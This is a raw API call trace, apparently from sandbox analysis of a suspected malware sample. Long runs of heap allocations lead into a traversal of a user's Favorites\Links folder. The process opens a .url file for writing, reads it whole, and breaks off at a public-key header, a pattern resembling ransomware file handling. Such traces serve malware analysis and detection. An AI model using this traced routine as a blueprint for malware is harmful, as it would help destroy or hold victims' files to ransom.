RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0233.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0233.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0233.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0233.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0233.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0233.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0233.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0233.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0233.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0233.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.759] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0233.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0233.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.759] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0233.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bba08 [0233.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0233.759] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0233.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0233.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bba08 | out: hHeap=0x630000) returned 1 [0233.760] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0233.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.760] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0233.760] PathFindFileNameW (pszPath="") returned="" [0233.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0233.760] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0233.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0233.760] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0233.760] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0233.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0233.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e698 [0233.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0233.761] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned=".ini" [0233.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e698 | out: hHeap=0x630000) returned 1 [0233.761] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0233.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0233.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0233.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0233.761] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned=".url" [0233.761] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.762] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=236) returned 1 [0233.762] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.765] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xc6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.765] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.766] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0233.767] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xec, lpOverlapped=0x0) returned 1 [0233.767] lstrlenA (lpString="-----BEGIN PUBLIC 